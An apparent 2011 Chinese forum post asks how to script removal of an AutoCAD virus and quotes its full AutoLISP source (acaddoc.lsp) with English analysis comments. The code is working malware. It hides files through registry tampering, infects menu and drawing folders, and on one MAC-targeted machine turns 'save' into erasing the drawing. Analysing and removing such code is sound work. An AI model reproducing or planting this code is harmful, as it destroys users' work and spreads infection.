ftmm
发表于 2011-4-9 22:13
以下是 CAD 病毒代码,原文件名叫做 acaddoc.lsp。它与 dwg 文件放在同一目录时,AutoCAD 打开该 dwg 文件就会自动加载并执行它。病毒
首先会修改注册表,破坏系统"显示隐藏文件"的功能;然后把自己复制到 CAD 目录下,感染当前使用的 mnl 文件(从代码看是以追加方式写到文件末尾,而不是覆盖),并将这些文件设为隐藏属性。
然后在工作目录继续生成 acaddoc.lsp。不过它有一个 bug:可能会陷入死循环,在 CAD 的执行目录下不断向 acaddoc.lsp 写入同样的内容,
所以中了这个病毒之后,如果不按 Esc 键,就永远无法打开 CAD,而且这个文件可能会膨胀到几 GB 大小。
我想请教一下:我想做一个 bat 来清除这个病毒,而不是简单地删除文件。bat 首先枚举硬盘上所有的 mnl 文件和 lsp 文件,
再读取这些 mnl 和 lsp 文件,与以下内容对比:内容完全相同的就删除,不同的就保留,请问应该怎么做?(注意:从代码看,病毒是以追加方式把自己写到已有 mnl/lsp 文件的末尾,并以末行的 ;;;jjyy 作为感染标记,所以对被感染的正常文件应当截掉从 (defun s::startup 到 ;;;jjyy 的追加部分,而不是按整文件相同与否来删除;清理时还需要恢复被改掉的注册表 SHOWALL/NOHIDDEN 值,以及被设为隐藏的文件属性。)
;; s::startup is the function AutoCAD evaluates automatically after a drawing
;; loads, so everything below runs without user action as soon as a drawing is
;; opened with this acaddoc.lsp on the search path (see the poster's note).
;; NOTE(review): malware sample, annotated for analysis only; nothing is repaired.
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
(vl-load-com)
(setvar "cmdecho" 0) ; suppress command-line echo so the activity stays quiet
(setvar "filedia" 1)
;; Tampers with the Explorer "Hidden files and folders" Folder Options values.
;; The keys are under HKLM, so every user of the machine is affected; the poster
;; reports this breaks "show hidden files", which conceals the files that attset
;; marks Hidden further down.
(vl-registry-write
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
"CheckedValue"
0
)
(vl-registry-write
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
"CheckedValue"
0
)
(vl-registry-write
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
"DefaultValue"
0
)
(setq mnlpth (getvar "menuname")) ; current menu path; base for "<menu>.mnl" and "<menu>doc.lsp" below
(setq dwgpre (getvar "dwgprefix")) ; directory of the drawing being opened
;; Propagation. If an acaddoc.lsp is found on the AutoCAD search path it is used
;; as the source, and chklsp implants it into three targets: a doc.lsp and the
;; .mnl next to the current menu, and an acaddoc.lsp in the drawing's folder.
(if (setq doclsp (findfile "acaddoc.lsp"))
(progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
(chklsp (strcat mnlpth ".mnl") doclsp)
(chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
)
)
;; Obfuscated trigger key: each entry is a character code multiplied by a
;; constant. mkgroup divides the list by 1..500; at divisor 47 every entry
;; divides exactly and yields the character codes of "00:07:E9:0C:DF:83".
(setq mac0
'(2256 2256 2726 2256 2585 2726 3243 2679
2726 2256 3149 2726 3196 3290 2726 2632
2397
)
)
;; Arming condition for the destructive payload (dolsp). All three must hold:
;;  - the integer part of CDATE (YYYYMMDD) is after 2009-09-09;
;;  - the character codes of the first MAC address returned by macaddr equal
;;    one of the mkgroup candidates, i.e. (at divisor 47) the MAC decoded above.
;;    The destructive part is therefore aimed at one specific machine; every
;;    other infected host only propagates the file;
;;  - the first two fractional digits of CDATE (presumably the hour) are even.
;; If macaddr returns nil, (car nil) is nil and vl-string->list presumably errors
;; here, aborting the rest of s::startup -- TODO confirm on a host without adapters.
(if (and (> (setq cdate (getvar "cdate")) 20090909)
(member (vl-string->list (car (macaddr))) (mkgroup mac0))
(= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
)
(dolsp)
)
(princ)
)
;; chklsp: implant the virus source file fp2 into the target file fp1.
;; fp1 - path of the file to infect (a .mnl, doc.lsp or acaddoc.lsp)
;; fp2 - path of the source acaddoc.lsp whose text gets appended
;; When fp1 can be opened, its last line is examined: unless it already contains
;; the ";;;jjyy" infection marker (the final line of this sample), the source is
;; appended to it. When fp1 cannot be opened (typically: does not exist), writelsp
;; creates it in append mode. Both files then get attribute 2 via attset.
;; Note the marker check only looks at the LAST line, so any trailing content
;; after ";;;jjyy" causes a re-infection (another copy appended).
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
(if (setq fp3 (open fp1 "r"))
(progn
(if
(not
;; the while form's value is tem2, the last line read from fp1
(wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
"*;;;jjyy*"
)
)
(writelsp fp2 fp1) ; marker absent: append the virus text to fp1
)
(close fp3)
)
(writelsp fp2 fp1) ; fp1 missing: create it from the source
)
;; NOTE(review): the poster reports an endless write loop that grows
;; acaddoc.lsp to several GB. Presumably this occurs when fp1 and fp2 resolve
;; to the same file whose last line is not the marker, so writelsp keeps
;; reading the lines it is itself appending -- not confirmed here.
;; An empty fp1 leaves tem2 nil, and wcmatch on nil presumably errors.
(attset fp1 2)
(attset fp2 2)
)
;; writelsp: append every line of file fp1 to the end of file fp2.
;; fp1 - source path, opened for reading
;; fp2 - destination path, opened in append mode ("a"), created if missing
;; Neither open is checked; a nil handle would error in read-line/write-line.
;; Note the parameter order is the reverse of chklsp's (source comes first here),
;; which is why chklsp calls (writelsp fp2 fp1).
(defun writelsp (fp1 fp2 / fp3 fp4 tem)
(setq fp3 (open fp1 "r")
fp4 (open fp2 "a")
)
(while (setq tem (read-line fp3)) (write-line tem fp4)) ; line-by-line copy
(close fp3)
(close fp4)
(princ)
)
;; attset: set the Windows file attributes of fp to code through the
;; Scripting.FileSystemObject COM object (GetFile(fp).Attributes = code).
;; fp   - file path; nothing happens when it is "" (or when code is nil)
;; code - attribute value assigned; callers pass 2, which the poster describes
;;        as making the file hidden (2 is the FSO Hidden attribute value)
;; The assignment replaces the whole attribute set rather than OR-ing a bit, so
;; presumably any existing ReadOnly/Archive bits are dropped -- confirm if needed.
;; NOTE(review): the FileSystemObject created inline is never released, and
;; vlax-release-object runs on fp1 even when the if was skipped (fp1 nil).
(defun attset (fp code / fp1)
(if (and (/= "" fp) code)
(progn (vl-load-com)
(vlax-put-property
(setq fp1 (vlax-invoke-method
(vlax-create-object "Scripting.FileSystemObject")
'GetFile
fp
)
)
'Attributes
code
)
)
)
(vlax-release-object fp1)
)
;; mkgroup: build the 500 candidate lists the MAC check in s::startup compares
;; against. The k-th result is pt0 with every entry divided by k (integer
;; division, so inexact quotients truncate), for k = 1..500, in ascending order.
;; With the mac0 key this recovers the target MAC's character codes without
;; storing the address in clear text.
;; pt0 - list of integers (the scaled character codes)
;; Note: i is not in the local-variable list, so the counter leaks as a global.
(defun mkgroup (pt0 / pts)
(setq i 1)
(repeat 500
(setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
(setq i (1+ i))
)
(reverse pts) ; cons built the list backwards; restore k = 1 first
)
;; macaddr: enumerate the machine's MAC addresses via WMI.
;; Creates a SwbemScripting locator, connects to the local namespace (first with
;; security flag 128, and without flags if that call errors), runs
;; "Select * From Win32_NetworkAdapter", and collects the MACAddress of every
;; adapter that has a NetConnectionID, skipping duplicates.
;; Returns the addresses in enumeration order (built with cons, then reversed),
;; or nil when the locator cannot be created or no adapter qualifies.
;; Note: the vlax-for variable i is not declared local and leaks as a global.
(defun macaddr (/ mac WMIobj con lox sn)
(vl-load-com)
(if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
(progn
(setq
con (vl-catch-all-apply
'vlax-invoke
(list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
)
)
(if (vl-catch-all-error-p con) ; fallback: connect without flags
(setq
con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
)
)
(setq lox (vlax-invoke
con
'ExecQuery
"Select * From Win32_NetworkAdapter "
)
)
(vlax-for i lox
(if (vlax-get i 'NetConnectionID) ; only adapters with a connection name
(progn (setq sn (vlax-get i 'MACAddress))
(or (member sn mac) (setq mac (cons sn mac))) ; de-duplicate
)
)
)
(mapcar 'vlax-release-object (list lox con WMIobj))
)
)
(reverse mac)
)
;; dolsp: arm the destructive payload. Only reached when the date/MAC/hour
;; condition in s::startup holds. UNDEFINE disables the native commands so the
;; c:qsave / c:saveas / c:wblock / c:insert / c:pline functions defined below
;; are what the user gets when typing those command names.
(defun dolsp ()
(command "undefine" "qsave")
(command "undefine" "saveas")
(command "undefine" "wblock")
(command "undefine" "insert")
(command "undefine" "pline")
)
;; c:qsave: replacement for QSAVE once dolsp has undefined the native command.
;; Instead of saving, it erases every entity in the drawing ((ssget "x") selects
;; all) -- on the targeted machine, "saving" wipes the drawing.
(defun c:qsave ()
(command "_.erase" (ssget "x") "")
(princ)
)
;; c:saveas: replacement for SAVEAS. Shows a file dialog (title "图形另存为",
;; i.e. "Save Drawing As", defaulting to the drawing's folder), then uses the
;; chosen directory as another infection target by implanting acaddoc.lsp there
;; via chklsp. The drawing itself is never saved.
;; If the user cancels, fp1 is nil and vl-filename-directory presumably errors.
(defun c:saveas (/ fp1)
(setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
(chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
(findfile "acaddoc.lsp")
)
(princ)
)
;; c:wblock: replacement for WBLOCK after dolsp; does nothing, so the user can
;; no longer write blocks out of the drawing.
(defun c:wblock () (princ))
;; c:insert: replacement for INSERT after dolsp; does nothing, so block
;; insertion is silently disabled.
(defun c:insert () (princ))
;; c:pline: replacement for PLINE after dolsp; starts the plain LINE command
;; instead, so polylines can no longer be drawn.
(defun c:pline () (command "_.line") (princ))
;;;jjyy